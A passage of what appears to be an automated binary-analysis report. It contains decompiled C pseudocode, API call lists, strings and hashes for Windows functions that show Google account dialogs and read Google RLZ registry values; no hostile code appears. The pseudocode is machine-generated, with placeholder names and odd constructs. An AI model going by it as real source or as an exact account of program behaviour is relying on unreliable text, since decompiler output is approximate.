                                                                                                                                                                    						MessageBeep(0xffffffff);
                                                                                                                                                                    						_t132 = _t128 + 0x20;
                                                                                                                                                                    						__eflags = _t132;
                                                                                                                                                                    						if(_t132 == 0) {
                                                                                                                                                                    							_t79 = 0;
                                                                                                                                                                    							__eflags = 0;
                                                                                                                                                                    						} else {
                                                                                                                                                                    							_t12 = _t132 - 0x20; // -64
                                                                                                                                                                    							_t79 = _t12;
                                                                                                                                                                    						}
                                                                                                                                                                    						_push(0x453);
                                                                                                                                                                    						_push( *((intOrPtr*)(_t79 + 4)));
                                                                                                                                                                    						goto L15;
                                                                                                                                                                    					}
                                                                                                                                                                    				} else {
                                                                                                                                                                    					MessageBeep(0xffffffff);
                                                                                                                                                                    					_t133 = _t126 + 0x20;
                                                                                                                                                                    					_t149 = _t133;
                                                                                                                                                                    					if(_t133 == 0) {
                                                                                                                                                                    						_push(0x452);
                                                                                                                                                                    						_push( *0x00000004);
                                                                                                                                                                    					} else {
                                                                                                                                                                    						_push(0x452);
                                                                                                                                                                    						_push( *((intOrPtr*)(_t133 - 0x1c)));
                                                                                                                                                                    					}
                                                                                                                                                                    					L15:
                                                                                                                                                                    					SetFocus(GetDlgItem());
                                                                                                                                                                    					L16:
                                                                                                                                                                    					_t129 = _t135 + 4;
                                                                                                                                                                    					CheckDlgButton( *(_t135 + 4), 0x3f3, 1);
                                                                                                                                                                    					L00447AD0(_t115, _t135);
                                                                                                                                                                    					E004471C0(_t129);
                                                                                                                                                                    					_t136 = _t135 + 0x30;
                                                                                                                                                                    					 *((intOrPtr*)(_t135 + 0x84)) = 0x40;
                                                                                                                                                                    					L004489F0(_t135 + 0x30, L"https://www.google.com/accounts/NewAccount?service=goopy&hl=zh-CN", _t115, _t149);
                                                                                                                                                                    					_t116 =  *_t129;
                                                                                                                                                                    					if(E0044A1F0(GetDlgItem( *_t129, 0x454), _t135 + 0x30) != 0) {
                                                                                                                                                                    						E004492A0(_t136);
                                                                                                                                                                    					}
                                                                                                                                                                    					_t138 = _a4 + 0x8c;
                                                                                                                                                                    					 *((intOrPtr*)(_a4 + 0xe0)) = 0x40;
                                                                                                                                                                    					_t53 = E0044A1F0(GetDlgItem( *_t129, 0x455), _a4 + 0x8c);
                                                                                                                                                                    					_t151 = _t53;
                                                                                                                                                                    					if(_t53 != 0) {
                                                                                                                                                                    						E004492A0(_t138);
                                                                                                                                                                    					}
                                                                                                                                                                    					L004489F0(_t138, L"https://www.google.com/accounts/ForgotPasswd?service=goopy&hl=zh-CN", _t116, _t151);
                                                                                                                                                                    					_t117 =  *((intOrPtr*)(_a4 + 0x24));
                                                                                                                                                                    					_t152 =  *((intOrPtr*)(_t117 - 0xc));
                                                                                                                                                                    					if( *((intOrPtr*)(_t117 - 0xc)) == 0) {
                                                                                                                                                                    						 *[fs:0x0] = _v16;
                                                                                                                                                                    						return 1;
                                                                                                                                                                    					} else {
                                                                                                                                                                    						_t56 =  *0x559000; // 0x521840
                                                                                                                                                                    						_t22 = _t56 + 0xc; // 0x4edeb4
                                                                                                                                                                    						_t118 =  *_t22;
                                                                                                                                                                    						_t23 =  *((intOrPtr*)( *_t22))() + 0x10; // 0x10
                                                                                                                                                                    						_t140 = _t23;
                                                                                                                                                                    						_v24 = _t140;
                                                                                                                                                                    						_v8 = 0;
                                                                                                                                                                    						_t58 = L00410DE0(_t152, 0x74);
                                                                                                                                                                    						_t103 = _t58;
                                                                                                                                                                    						_t153 = _t58;
                                                                                                                                                                    						if(_t58 != 0) {
                                                                                                                                                                    							L00410F90(0x74, _t103, _t118,  &_v24);
                                                                                                                                                                    							_t140 = _v28;
                                                                                                                                                                    						}
                                                                                                                                                                    						SetWindowTextW( *_t129, _t140);
                                                                                                                                                                    						_t60 = L00410DE0(_t153, 0x75);
                                                                                                                                                                    						_t105 = _t60;
                                                                                                                                                                    						if(_t60 != 0) {
                                                                                                                                                                    							L00410F90(0x75, _t105,  &_v24,  &_v24);
                                                                                                                                                                    							_t140 = _v28;
                                                                                                                                                                    						}
                                                                                                                                                                    						SetDlgItemTextW( *_t129, 0x456, _t140);
                                                                                                                                                                    						SetFocus(GetDlgItem( *_t129, 0x453));
                                                                                                                                                                    						_t119 =  *_t129;
                                                                                                                                                                    						ShowWindow(GetDlgItem(_t119, 0x3f3), 5);
                                                                                                                                                                    						_t30 = _t140 - 0x10; // 0x0
                                                                                                                                                                    						_t67 = _t30;
                                                                                                                                                                    						_v8 = 0xffffffff;
                                                                                                                                                                    						asm("lock xadd [ecx], edx");
                                                                                                                                                                    						if((_t119 | 0xffffffff) - 1 <= 0) {
                                                                                                                                                                    							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t67)) + 4))))(_t67);
                                                                                                                                                                    						}
                                                                                                                                                                    						 *[fs:0x0] = _v16;
                                                                                                                                                                    						return 0;
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    			}






























                                                                                                                                                                    APIs
                                                                                                                                                                    • SetDlgItemTextW.USER32 ref: 00447610
                                                                                                                                                                    • MessageBeep.USER32(000000FF), ref: 00447618
                                                                                                                                                                    • GetDlgItem.USER32 ref: 0044767C
                                                                                                                                                                    • SetFocus.USER32(00000000), ref: 00447683
                                                                                                                                                                    • CheckDlgButton.USER32(?,000003F3,00000001), ref: 00447697
                                                                                                                                                                    • GetDlgItem.USER32 ref: 004476C7
                                                                                                                                                                    • GetDlgItem.USER32 ref: 004476F7
                                                                                                                                                                    • SetWindowTextW.USER32(00000000,00000010), ref: 00447770
                                                                                                                                                                    • SetDlgItemTextW.USER32 ref: 004477A2
                                                                                                                                                                    • GetDlgItem.USER32 ref: 004477B6
                                                                                                                                                                    • SetFocus.USER32(00000000,?,00000453), ref: 004477B9
                                                                                                                                                                    • GetDlgItem.USER32 ref: 004477C7
                                                                                                                                                                    • ShowWindow.USER32(00000000,00000005,?,000003F3,?,00000453), ref: 004477CC
                                                                                                                                                                    Strings
                                                                                                                                                                    • https://www.google.com/accounts/ForgotPasswd?service=goopy&hl=zh-CN, xrefs: 0044770F
                                                                                                                                                                    • https://www.google.com/accounts/NewAccount?service=goopy&hl=zh-CN, xrefs: 004476AC
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Item$Text$FocusWindow$BeepButtonCheckMessageShow
                                                                                                                                                                    • String ID: https://www.google.com/accounts/ForgotPasswd?service=goopy&hl=zh-CN$https://www.google.com/accounts/NewAccount?service=goopy&hl=zh-CN
                                                                                                                                                                    • API String ID: 188825679-1338281193
                                                                                                                                                                    • Opcode ID: 67bedfe663c1ed3b270cec0cef657b75b9fcbb6d850d596a0e86654c2d693596
                                                                                                                                                                    • Instruction ID: c65a61f1653cf146aaab41092458ce8f70ad9666dfa818d69d7c21afcd1342b0
                                                                                                                                                                    • Opcode Fuzzy Hash: 67bedfe663c1ed3b270cec0cef657b75b9fcbb6d850d596a0e86654c2d693596
                                                                                                                                                                    • Instruction Fuzzy Hash: B661E4B5704B019BE310DB68CC45B1BB7A5FF98725F00861AFA15873D1EB78E806CB99
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                                                    			E004C3630(int* __edx, void* __ebp, void* __eflags) {
                                                                                                                                                                    				char _v4;
                                                                                                                                                                    				char _v8;
                                                                                                                                                                    				char _v12;
                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                    				char _v28;
                                                                                                                                                                    				short _v32;
                                                                                                                                                                    				int _v36;
                                                                                                                                                                    				int* _v40;
                                                                                                                                                                    				char _v44;
                                                                                                                                                                    				void* _v48;
                                                                                                                                                                    				void* _v52;
                                                                                                                                                                    				char _v56;
                                                                                                                                                                    				int* _v60;
                                                                                                                                                                    				void* _v64;
                                                                                                                                                                    				char _v68;
                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				signed int _t52;
                                                                                                                                                                    				signed int _t54;
                                                                                                                                                                    				void* _t58;
                                                                                                                                                                    				char _t60;
                                                                                                                                                                    				intOrPtr _t63;
                                                                                                                                                                    				void* _t70;
                                                                                                                                                                    				intOrPtr* _t74;
                                                                                                                                                                    				void* _t75;
                                                                                                                                                                    				signed int _t82;
                                                                                                                                                                    				void* _t83;
                                                                                                                                                                    				void* _t90;
                                                                                                                                                                    				void* _t91;
                                                                                                                                                                    				void* _t95;
                                                                                                                                                                    				signed int _t100;
                                                                                                                                                                    				void* _t101;
                                                                                                                                                                    				void* _t102;
                                                                                                                                                                    				signed int _t109;
                                                                                                                                                                    				void* _t119;
                                                                                                                                                                    				void* _t120;
                                                                                                                                                                    				int _t121;
                                                                                                                                                                    				void* _t123;
                                                                                                                                                                    				void* _t124;
                                                                                                                                                                    				void* _t126;
                                                                                                                                                                    				void* _t133;
                                                                                                                                                                    				signed int _t134;
                                                                                                                                                                    				signed int _t135;
                                                                                                                                                                    				void* _t137;
                                                                                                                                                                    
                                                                                                                                                                    				_t137 = __eflags;
                                                                                                                                                                    				_t116 = __edx;
                                                                                                                                                                    				_push(0xffffffff);
                                                                                                                                                                    				_push(0x5174d0);
                                                                                                                                                                    				_push( *[fs:0x0]);
                                                                                                                                                                    				_t134 = _t133 - 0x34;
                                                                                                                                                                    				_t52 =  *0x5596fc; // 0x9d48295
                                                                                                                                                                    				_v16 = _t52 ^ _t134;
                                                                                                                                                                    				_t54 =  *0x5596fc; // 0x9d48295
                                                                                                                                                                    				_push(_t54 ^ _t134);
                                                                                                                                                                    				 *[fs:0x0] =  &_v12;
                                                                                                                                                                    				_t100 = 0;
                                                                                                                                                                    				_v52 = 0;
                                                                                                                                                                    				_t119 = CreateMutexW(0, 0, L"{A946A6A9-917E-4949-B9BC-6BADA8C7FD63}");
                                                                                                                                                                    				_push(_t119);
                                                                                                                                                                    				_v48 = _t119;
                                                                                                                                                                    				_t58 = L004C5D10(_t116, _t137);
                                                                                                                                                                    				_t135 = _t134 + 4;
                                                                                                                                                                    				if(_t58 != 0) {
                                                                                                                                                                    					_t100 = 0 | WaitForSingleObject(_t119, 0x1388) == 0x00000000;
                                                                                                                                                                    					_v52 = 0;
                                                                                                                                                                    				}
                                                                                                                                                                    				_v4 = 0;
                                                                                                                                                                    				if(_t100 == 0) {
                                                                                                                                                                    					L8:
                                                                                                                                                                    					CloseHandle(_t119);
                                                                                                                                                                    					_t60 = 0;
                                                                                                                                                                    					L33:
                                                                                                                                                                    					 *[fs:0x0] = _v12;
                                                                                                                                                                    					_pop(_t120);
                                                                                                                                                                    					_pop(_t123);
                                                                                                                                                                    					_pop(_t101);
                                                                                                                                                                    					return L004EEDC9(_t60, _t101, _v16 ^ _t135, _t116, _t120, _t123);
                                                                                                                                                                    				}
                                                                                                                                                                    				_v60 = 0x80000001;
                                                                                                                                                                    				_v4 = 1;
                                                                                                                                                                    				if(E004C75E0() == 0) {
                                                                                                                                                                    					_v44 = 0;
                                                                                                                                                                    					_v40 = 0;
                                                                                                                                                                    					_v36 = 0;
                                                                                                                                                                    					_v4 = 2;
                                                                                                                                                                    					_t63 =  *0x559000; // 0x521840
                                                                                                                                                                    					_t16 = _t63 + 0xc; // 0x4edeb4
                                                                                                                                                                    					_v64 =  *((intOrPtr*)( *_t16))() + 0x10;
                                                                                                                                                                    					_push("N");
                                                                                                                                                                    					_push(L"Events");
                                                                                                                                                                    					_v4 = 3;
                                                                                                                                                                    					L004C7EF0( &_v64, L"%s\\%s\\%s", L"Software\\Google\\Common\\Rlz");
                                                                                                                                                                    					_t135 = _t135 + 0x10;
                                                                                                                                                                    					_push( &_v44);
                                                                                                                                                                    					_t116 = 0x20019;
                                                                                                                                                                    					_t70 = E00401710(_v64, _v60, 0x20019);
                                                                                                                                                                    					__eflags = _t70;
                                                                                                                                                                    					if(_t70 == 0) {
                                                                                                                                                                    						_t102 = _v48;
                                                                                                                                                                    						_t121 = 0;
                                                                                                                                                                    						__eflags = 0;
                                                                                                                                                                    						do {
                                                                                                                                                                    							_t116 =  &_v36;
                                                                                                                                                                    							_t109 = 0;
                                                                                                                                                                    							_v32 = 0;
                                                                                                                                                                    							_v36 = 5;
                                                                                                                                                                    							_t124 = RegEnumValueW(_t102, _t121,  &_v32,  &_v36, 0, 0, 0, 0);
                                                                                                                                                                    							__eflags = _t124;
                                                                                                                                                                    							if(_t124 != 0) {
                                                                                                                                                                    								goto L23;
                                                                                                                                                                    							}
                                                                                                                                                                    							_t82 = 0;
                                                                                                                                                                    							__eflags = _v32;
                                                                                                                                                                    							if(_v32 == 0) {
                                                                                                                                                                    								goto L23;
                                                                                                                                                                    							} else {
                                                                                                                                                                    								goto L19;
                                                                                                                                                                    							}
                                                                                                                                                                    							do {
                                                                                                                                                                    								L19:
                                                                                                                                                                    								_t82 = _t82 + 1;
                                                                                                                                                                    								__eflags =  *(_t135 + 0x38 + _t82 * 2);
                                                                                                                                                                    							} while ( *(_t135 + 0x38 + _t82 * 2) != 0);
                                                                                                                                                                    							__eflags = _t82 - 3;
                                                                                                                                                                    							if(_t82 != 3) {
                                                                                                                                                                    								goto L23;
                                                                                                                                                                    							}
                                                                                                                                                                    							_t109 =  &_v28;
                                                                                                                                                                    							_v60 = 0;
                                                                                                                                                                    							_t83 = E004C6230(_t109,  &_v60);
                                                                                                                                                                    							_t135 = _t135 + 4;
                                                                                                                                                                    							__eflags = _t83;
                                                                                                                                                                    							if(_t83 == 0) {
                                                                                                                                                                    								goto L23;
                                                                                                                                                                    							}
                                                                                                                                                                    							__eflags = _v60 - 4;
                                                                                                                                                                    							if(_v60 == 4) {
                                                                                                                                                                    								L004C8A50( &_v68,  &_v36);
                                                                                                                                                                    								E00401590( &_v48);
                                                                                                                                                                    								L004C7B10( &_v64);
                                                                                                                                                                    								L004C5DF0( &_v56);
                                                                                                                                                                    								_t60 = 0;
                                                                                                                                                                    								goto L33;
                                                                                                                                                                    							}
                                                                                                                                                                    							L23:
                                                                                                                                                                    							_t121 = _t121 + 1;
                                                                                                                                                                    							__eflags = _t124;
                                                                                                                                                                    						} while (_t124 == 0);
                                                                                                                                                                    						_v8 = 2;
                                                                                                                                                                    						_t74 = _v68 + 0xfffffff0;
                                                                                                                                                                    						_t41 = _t74 + 0xc; // -228
                                                                                                                                                                    						_t116 = _t41;
                                                                                                                                                                    						asm("lock xadd [edx], ecx");
                                                                                                                                                                    						__eflags = (_t109 | 0xffffffff) - 1;
                                                                                                                                                                    						if((_t109 | 0xffffffff) - 1 <= 0) {
                                                                                                                                                                    							_t116 =  *((intOrPtr*)( *_t74));
                                                                                                                                                                    							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t74)) + 4))))(_t74);
                                                                                                                                                                    						}
                                                                                                                                                                    						__eflags = _t102;
                                                                                                                                                                    						if(_t102 != 0) {
                                                                                                                                                                    							RegCloseKey(_t102);
                                                                                                                                                                    						}
                                                                                                                                                                    						_t75 = _v64;
                                                                                                                                                                    						__eflags = _t75;
                                                                                                                                                                    						if(_t75 != 0) {
                                                                                                                                                                    							__eflags = _t75 - 0x80000001;
                                                                                                                                                                    							if(_t75 != 0x80000001) {
                                                                                                                                                                    								RegCloseKey(_t75);
                                                                                                                                                                    							}
                                                                                                                                                                    						}
                                                                                                                                                                    						_t126 = _v52;
                                                                                                                                                                    						ReleaseMutex(_t126);
                                                                                                                                                                    						_push(_t126);
                                                                                                                                                                    						L32:
                                                                                                                                                                    						CloseHandle();
                                                                                                                                                                    						_t60 = 1;
                                                                                                                                                                    						goto L33;
                                                                                                                                                                    					}
                                                                                                                                                                    					L004C8A50( &_v68, 0x20019);
                                                                                                                                                                    					_t90 = _v48;
                                                                                                                                                                    					__eflags = _t90;
                                                                                                                                                                    					if(_t90 != 0) {
                                                                                                                                                                    						RegCloseKey(_t90);
                                                                                                                                                                    					}
                                                                                                                                                                    					_t91 = _v64;
                                                                                                                                                                    					__eflags = _t91;
                                                                                                                                                                    					if(_t91 != 0) {
                                                                                                                                                                    						__eflags = _t91 - 0x80000001;
                                                                                                                                                                    						if(_t91 != 0x80000001) {
                                                                                                                                                                    							RegCloseKey(_t91);
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    					ReleaseMutex(_t119);
                                                                                                                                                                    					_push(_t119);
                                                                                                                                                                    					goto L32;
                                                                                                                                                                    				}
                                                                                                                                                                    				_t95 = _v60;
                                                                                                                                                                    				if(_t95 != 0 && _t95 != 0x80000001) {
                                                                                                                                                                    					RegCloseKey(_t95);
                                                                                                                                                                    				}
                                                                                                                                                                    				ReleaseMutex(_t119);
                                                                                                                                                                    				goto L8;
                                                                                                                                                                    			}
                                                                                                                                                                    0x004c3762
                                                                                                                                                                    0x004c3764
                                                                                                                                                                    0x004c3767
                                                                                                                                                                    0x004c3767
                                                                                                                                                                    0x004c3769
                                                                                                                                                                    0x004c376d
                                                                                                                                                                    0x004c376f
                                                                                                                                                                    0x004c3771
                                                                                                                                                                    0x004c3776
                                                                                                                                                                    0x004c3779
                                                                                                                                                                    0x004c3779
                                                                                                                                                                    0x004c3776
                                                                                                                                                                    0x004c377c
                                                                                                                                                                    0x004c3782
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x004c3782
                                                                                                                                                                    0x004c36bd
                                                                                                                                                                    0x004c36c3
                                                                                                                                                                    0x004c36cd
                                                                                                                                                                    0x004c36cd
                                                                                                                                                                    0x004c36d4
                                                                                                                                                                    0x00000000

                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateMutexW.KERNEL32(00000000,00000000,{A946A6A9-917E-4949-B9BC-6BADA8C7FD63},09D48295,?,09D48295,?,00000000), ref: 004C3671
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00001388), ref: 004C3690
                                                                                                                                                                      • Part of subcall function 00401710: RegCloseKey.ADVAPI32(?,?,?,004018A8,?), ref: 00401753
                                                                                                                                                                    • RegCloseKey.ADVAPI32(80000001), ref: 004C36CD
                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 004C36D4
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004C36DB
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 004C3767
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 004C3779
                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000,?), ref: 004C377C
                                                                                                                                                                    • RegEnumValueW.ADVAPI32 ref: 004C37AF
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004C3826
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004C3838
                                                                                                                                                                    • ReleaseMutex.KERNEL32(?), ref: 004C383F
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 004C3846
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Close$Mutex$Release$Handle$CreateEnumObjectSingleValueWait
                                                                                                                                                                    • String ID: %s\%s\%s$Events$Software\Google\Common\Rlz${A946A6A9-917E-4949-B9BC-6BADA8C7FD63}
                                                                                                                                                                    • API String ID: 499141423-912985715
                                                                                                                                                                    • Opcode ID: 3a4d7eba788c03e757babe54a931b50c2e88402cc54554b93bed1cb501acc306
                                                                                                                                                                    • Instruction ID: df1f3368969b247ec07a1e940d9db436778b25cf35964f8ec4418c6cea851c44
                                                                                                                                                                    • Opcode Fuzzy Hash: 3a4d7eba788c03e757babe54a931b50c2e88402cc54554b93bed1cb501acc306
                                                                                                                                                                    • Instruction Fuzzy Hash: C36112791043409BC350EF28C885E2BBBE8FF99355F14891EF44193361C778E949CB6A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 84%
                                                                                                                                                                    			E004C5550(signed int __ecx, signed int __edx, void* __ebp, void* __eflags) {
                                                                                                                                                                    				signed int _v4;
                                                                                                                                                                    				char _v8;
                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                    				char _v280;
                                                                                                                                                                    				signed int _v284;
                                                                                                                                                                    				signed int _v288;
                                                                                                                                                                    				signed int _v292;
                                                                                                                                                                    				signed int _v296;
                                                                                                                                                                    				signed int _v300;
                                                                                                                                                                    				signed int _v304;
                                                                                                                                                                    				signed int _v308;
                                                                                                                                                                    				signed int _v312;
                                                                                                                                                                    				char _v320;
                                                                                                                                                                    				intOrPtr _v324;
                                                                                                                                                                    				signed int _v328;
                                                                                                                                                                    				void* _v332;
                                                                                                                                                                    				char _v336;
                                                                                                                                                                    				signed int _v340;
                                                                                                                                                                    				signed int _v344;
                                                                                                                                                                    				char _v348;
                                                                                                                                                                    				void* _v352;
                                                                                                                                                                    				char _v356;
                                                                                                                                                                    				char _v360;
                                                                                                                                                                    				signed int _v364;
                                                                                                                                                                    				signed int _v368;
                                                                                                                                                                    				char _v372;
                                                                                                                                                                    				void* _v376;
                                                                                                                                                                    				char _v377;
                                                                                                                                                                    				char _v380;
                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				signed int _t147;
                                                                                                                                                                    				signed int _t149;
                                                                                                                                                                    				void* _t153;
                                                                                                                                                                    				signed int _t155;
                                                                                                                                                                    				void* _t158;
                                                                                                                                                                    				signed int _t164;
                                                                                                                                                                    				signed int _t170;
                                                                                                                                                                    				intOrPtr _t176;
                                                                                                                                                                    				signed int _t177;
                                                                                                                                                                    				signed int** _t180;
                                                                                                                                                                    				signed int** _t182;
                                                                                                                                                                    				signed int** _t184;
                                                                                                                                                                    				void* _t185;
                                                                                                                                                                    				void* _t201;
                                                                                                                                                                    				signed int** _t204;
                                                                                                                                                                    				signed int _t205;
                                                                                                                                                                    				intOrPtr* _t208;
                                                                                                                                                                    				signed int _t221;
                                                                                                                                                                    				signed int _t222;
                                                                                                                                                                    				signed int _t226;
                                                                                                                                                                    				signed int _t236;
                                                                                                                                                                    				signed int _t237;
                                                                                                                                                                    				intOrPtr* _t238;
                                                                                                                                                                    				signed int _t245;
                                                                                                                                                                    				signed int _t249;
                                                                                                                                                                    				signed int** _t254;
                                                                                                                                                                    				signed int _t260;
                                                                                                                                                                    				void* _t261;
                                                                                                                                                                    				signed int _t264;
                                                                                                                                                                    				signed int _t281;
                                                                                                                                                                    				signed int _t291;
                                                                                                                                                                    				intOrPtr _t317;
                                                                                                                                                                    				intOrPtr _t318;
                                                                                                                                                                    				signed int _t320;
                                                                                                                                                                    				signed int _t322;
                                                                                                                                                                    				intOrPtr _t324;
                                                                                                                                                                    				signed int _t326;
                                                                                                                                                                    				signed int _t333;
                                                                                                                                                                    				void* _t334;
                                                                                                                                                                    				signed int _t335;
                                                                                                                                                                    				signed int _t337;
                                                                                                                                                                    				signed int _t338;
                                                                                                                                                                    				signed int _t341;
                                                                                                                                                                    				void* _t342;
                                                                                                                                                                    				signed int _t343;
                                                                                                                                                                    				signed int _t344;
                                                                                                                                                                    				signed int _t346;
                                                                                                                                                                    				signed int _t347;
                                                                                                                                                                    				signed int _t348;
                                                                                                                                                                    				signed int _t349;
                                                                                                                                                                    				char _t350;
                                                                                                                                                                    				void* _t353;
                                                                                                                                                                    				void* _t355;
				signed int _t356;
				signed int _t357;
				void* _t359;
				void* _t360;

				_t360 = __eflags;
				_t316 = __edx;
				_push(0xffffffff);
				_push(0x51af44);
				_push( *[fs:0x0]);
				_t356 = _t355 - 0x174;
				_t147 =  *0x5596fc; // 0x9d48295
				_v16 = _t147 ^ _t356;
				_push(__ebp);
				_t149 =  *0x5596fc; // 0x9d48295
				_push(_t149 ^ _t356);
				 *[fs:0x0] =  &_v12;
				_t341 = 0;
				_t333 = __ecx;
				_t260 = 0;
				_v328 = __ecx;
				_v336 = 0;
				_t353 = CreateMutexW(0, 0, L"{A946A6A9-917E-4949-B9BC-6BADA8C7FD63}");
				_push(_t353);
				_v332 = _t353;
				_t153 = L004C5D10(_t316, _t360);
				_t357 = _t356 + 4;
				if(_t153 != 0) {
					_t260 = 0 | WaitForSingleObject(_t353, 0x1388) == 0x00000000;
					_v336 = 0;
				}
				_v4 = _t341;
				if(_t260 == 0) {
					L11:
					CloseHandle(_t353);
					_t155 = 0;
					L74:
					 *[fs:0x0] = _v12;
					_pop(_t334);
					_pop(_t342);
					_pop(_t261);
					return L004EEDC9(_t155, _t261, _v16 ^ _t357, _t316, _t334, _t342);
				}
				_v352 = 0x80000001;
				_v4 = 1;
				if(E004C75E0() != 0) {
					L7:
					_t158 = _v352;
					if(_t158 != 0 && _t158 != 0x80000001) {
						RegCloseKey(_t158);
					}
					ReleaseMutex(_t353);
					goto L11;
				}
				if(E004C76D0(_t260, _t316, _t333, _t341) == 0) {
					L12:
					E004C8730(_t333,  &_v372);
					_push( &_v344);
					_v8 = 2;
					_t343 = _t341 | 0xffffffff;
					_v344 = _t343;
					_t164 = E004C5370(_t333);
					_t357 = _t357 + 4;
					__eflags = _t164;
					if(_t164 != 0) {
						__eflags = _v340;
						if(_v340 != 0) {
							_t317 =  *0x559000; // 0x521840
							_t26 = _t317 + 0xc; // 0x4edeb4
							_v356 =  *((intOrPtr*)( *_t26))() + 0x10;
							_v4 = 3;
							_t318 =  *0x559000; // 0x521840
							_t29 = _t318 + 0xc; // 0x4edeb4
							_t170 =  *((intOrPtr*)( *_t29))() + 0x10;
							__eflags = _t170;
							_v344 = _t170;
							_v4 = 4;
							L004C7EF0( &_v356, L"%s: ", L"events");
							L004C7EF0( &_v344, L"%s: ", L"stateful-events");
							_t359 = _t357 + 0x10;
							_v324 = L004C78C0(L"rlz");
							while(1) {
								_t344 = _t343 + 1;
								__eflags = _t344;
								_t279 = _v372;
								_t176 =  *((intOrPtr*)(_v372 - 0xc));
								if(_t344 < 0) {
									goto L22;
								}
								__eflags = _t344 - _t176;
								if(_t344 > _t176) {
									goto L22;
								}
								_t249 = E004C8190(_t279 + _t344 * 2, "\n");
								__eflags = _t249;
								if(_t249 == 0) {
									goto L22;
								}
								_v364 = _t249 - _v372 >> 1;
								L23:
								_t335 = _v364;
								__eflags = _t335;
								if(_t335 < 0) {
									_t335 = _v340;
								}
								__eflags = _t335 - _t344;
								if(_t335 <= _t344) {
									L58:
									__eflags = _v364;
									if(_v364 < 0) {
										goto L61;
									}
									_t343 = _v364;
									continue;
								} else {
									_t324 =  *0x559000; // 0x521840
									_t44 = _t324 + 0xc; // 0x4edeb4
									_v376 =  *((intOrPtr*)( *_t44))() + 0x10;
									_t291 = _t344;
									_v4 = 5;
									_t201 = L00413A70(_t335 - _t344, _t291,  &_v320,  &_v372);
									_v8 = 6;
									L00410C10(_t201,  &_v380);
									_v8 = 5;
									_t204 = _v324 + 0xfffffff0;
									_t326 =  &(_t204[3]);
									asm("lock xadd [edx], ecx");
									__eflags = (_t291 | 0xffffffff) - 1;
									if((_t291 | 0xffffffff) - 1 <= 0) {
										_t326 =  *( *_t204);
										 *((intOrPtr*)( *((intOrPtr*)(_t326 + 4))))(_t204);
									}
									_t353 = _v376;
									_t345 = _t353;
									_t205 = E004C77A0(_t353, _t353);
									__eflags = _t205;
									if(_t205 == 0) {
										__eflags = E004C77A0(_t345, _t353);
										if(__eflags == 0) {
											__eflags = E004C77A0(_t345, _t353);
											if(__eflags == 0) {
												goto L55;
											}
											_t337 = 0;
											_v296 = 0;
											_v292 = 0;
											_v288 = 0;
											_v284 = 0;
											_push( &_v296);
											_t326 =  &_v376;
											_v4 = 0xb;
											L004C3AB0(_t326, __eflags,  &_v344);
											_t346 = _v292;
											_t264 = _v296;
											_t359 = _t359 + 8;
											__eflags = _t346;
											if(_t346 <= 0) {
												L53:
												__eflags = _t264;
												if(_t264 != 0) {
													E004EF421(_t264);
													_t359 = _t359 + 4;
												}
												goto L55;
											}
											__eflags = 0 - _t346;
											if(__eflags >= 0) {
												L60:
												E00401050(_t264, _t326, 0x80070057);
												L61:
												_t281 = _v328;
												_t319 =  &_v377;
												_v377 = 0;
												_t177 = L004C69C0(_t281,  &_v377, _t353,  &_v280);
